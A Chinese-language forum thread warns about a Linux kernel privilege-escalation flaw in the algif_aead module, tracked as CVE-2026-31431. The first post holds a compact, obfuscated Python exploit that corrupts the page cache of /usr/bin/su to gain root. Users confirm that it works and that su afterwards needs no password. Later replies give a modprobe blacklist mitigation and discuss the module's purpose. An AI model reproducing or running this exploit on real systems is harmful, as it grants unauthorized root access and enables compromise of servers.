linux爆一键本地提取漏洞,各位多用户的注意下你们的服务器
← 返回列表

当前位置: 作者:星河 · 2026-04-30 01:03:37

#1 星河 · 2026-04-30 01:03:37
stalltrix
CVE-2026-31431 Copy Fail漏洞

参考这个:
https://access.redhat.com/security/cve/cve-2026-31431
https://ubuntu.com/security/CVE-2026-31431#status

通杀大部分高版本新内核。




测试代码

```python
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"4+c],[(h,3,i4),(h,2,b'\x10'+i19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")
```


临时修复方案

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead 2>/dev/null

不过建议更新内核解决。

漏洞来自algif模块
#2 LoopLab · 2026-04-30 02:11:36
stalltrix
卧槽是真的,ubuntu 24.04成功验证
#3 LoopLab · 2026-04-30 03:14:27
stalltrix
怎么回事,我执行这个测试代码后,su怎么变了。现在使用su不输密码了
#4 星河 · 2026-04-30 03:22:44
stalltrix
这个就是通过污染页内存缓存来提取的,你su的页内存被污染了。重启一下
#5 duso · 2026-04-30 03:41:23
stalltrix
我就是一个人用的vps,不是多用户环境,应该没事吧
#6 刘邦 · 2026-04-30 04:51:18
stalltrix
@duso 这种也有风险,你无法保证www-data -> root这种提权。如果被通过web入侵了,就能拿到完整的服务器权限
#7 刘邦 · 2026-04-30 05:53:26
stalltrix
algif就是经常爆漏洞,记得以前报过几次
#8 下耕 · 2026-04-30 06:11:29
stalltrix
新手问一下,linux的algif模块是干什么的呢? 看了一下,似乎很多软件并没有用到。
#9 刘邦 · 2026-04-30 06:21:54
stalltrix
algif就是Linux 提供的 AF_ALG 用户态加密接口。用户空间程序通过 socket 调用。然后在内核里完成加密。再把数据返回用户空间程序
#10 下耕 · 2026-04-30 06:26:24
stalltrix
禁用来缓解,会不会影响tls性能呢。感觉tls也会使用aead这种加密算法
#11 星河 · 2026-04-30 06:46:14
stalltrix
影响个p,主流应用的ssl模块(openssl之类),都是在自己的用户空间使用加密算法,都不会使用内核的。

我都怀疑algif这个模块是专门留后门的模块,使用这种伪需求的理由留着linux kernel里面的
#12 下耕 · 2026-04-30 07:56:42
stalltrix
我问ai,ai说algif模块其实用途很广泛,像 IPsec / WireGuard / LUKS 加密。都会使用这个内核级别的加密接口的。
#13 星河 · 2026-04-30 08:02:14
stalltrix
不要把ai灌的屎发过来,AF_ALG 接口是给用户态程序用的,提供一个用户态程序调用内核加密算法的路径,IPsec / WireGuard / LUKS 加密这些,本来就跑在内核态的数据,根本就不需要这个调用
#14 星河 · 2026-04-30 08:04:21
stalltrix
CPU 指令加速在用户态一样能用,根本没必要送进内核
#15 007幽灵 · 2026-04-30 09:00:08
stalltrix
我看了下,我们公司服务器 lsmod|grep algif_aead没有发现,是不是不收到影响?
#16 星河 · 2026-04-30 09:10:08
stalltrix
其实没用,只要 /lib/modules/$(uname -r)/kernel/ 中的algif_aead.ko存在,linux就会自动加载。

要不删除这个.ko,要不就像临时补丁一样,禁止加载`echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf`
#17 007幽灵 · 2026-04-30 09:15:18
stalltrix
算了,我还是不敢试,万一把公司服务器高崩了,交给运维操心这个吧
#18 kanshan · 2026-04-30 09:32:42
stalltrix
@星河 好像并不需要重启, `echo 3 > /proc/sys/vm/drop_caches`强行刷新页缓存内存就行

注册

或使用第三方注册

登录

没有账号? 立即注册
技术
闲聊
开发
正在提交...